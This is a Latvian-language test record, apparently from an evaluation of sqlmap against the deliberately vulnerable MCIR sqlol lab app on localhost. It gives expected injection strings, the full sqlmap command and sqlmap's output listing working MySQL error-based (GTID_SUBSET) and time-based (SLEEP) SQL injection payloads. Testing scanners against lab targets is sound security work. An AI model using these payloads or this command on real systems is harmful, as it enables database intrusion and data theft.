=================================================================================
1. Īpašība: tabulas ieraksti netiek izprinteti ieks .html, bet tiek raditas kludas
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: -
3.2. error-based: ?inject_string=test'
3.3. time-based: ?inject_string=test' or sleep(1)%23
3.4. union: -
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 1539181 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost/MCIR/sqlol/select.php?sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=none&error_level=verbose&inject_string=test&location=where_string&submit=Inject%21" -p inject_string --risk=3 --level=5

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] y
7.3. GET parameters 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 2013 HTTP(s) requests:
---
Parameter: inject_string (GET)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=none&error_level=verbose&inject_string=test' AND GTID_SUBSET(CONCAT(0x7171767671,(SELECT (ELT(4555=4555,1))),0x716a786a71),4555)-- HWOP&location=where_string&submit=Inject!

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=none&error_level=verbose&inject_string=test' AND (SELECT 4413 FROM (SELECT(SLEEP(5)))osTX)-- FbRA&location=where_string&submit=Inject!
---
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
